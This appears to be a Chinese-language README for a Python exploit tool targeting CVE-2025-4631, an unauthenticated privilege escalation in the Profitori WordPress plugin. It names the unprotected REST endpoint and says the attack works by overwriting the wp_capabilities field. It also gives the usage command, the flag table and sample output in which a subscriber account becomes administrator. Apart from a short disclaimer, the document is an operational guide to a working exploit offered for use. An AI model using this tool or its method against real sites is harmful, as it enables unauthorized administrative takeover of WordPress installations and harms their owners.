Profitori 插件(版本 2.0.6.0 至 2.1.1.3) 存在 未授权权限提升 漏洞,原因是 /wp-json/stocktend/v1/stocktend_object 端点缺少权限检查。攻击者可通过直接操纵 wp_capabilities 元字段,提升现有用户权限(或创建新用户)。
该 Python 漏洞利用工具自动执行权限提升过程:
readme.txt 文件检查插件版本。如果版本检查失败,该利用工具会谨慎进行,并发出警告。

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requests 库通过以下命令安装:
pip install requests
此工具仅供 教育和授权测试目的 使用。针对非您拥有或未经明确许可的系统滥用此漏洞利用工具是 严格禁止的。创建者对因不当使用造成的任何损害或法律后果概不负责。
作者: Nxploited ( Khaled_Alenazi )
| 标志 | 描述 | 必需 |
|---|
-u, --url | 🌐 WordPress 站点的基础 URL | ✅ 是 |
-id | 🆔 要提升权限的用户 ID | ✅ 是 |
--email | 📧 显示的虚假电子邮件 | ❌ 否 |
--name | 👤 显示名称 | ❌ 否 |
--url_field | 🔗 用户 URL 字段 | ❌ 否 |
--verbose | 🔍 打印完整 JSON 响应 | ❌ 否 |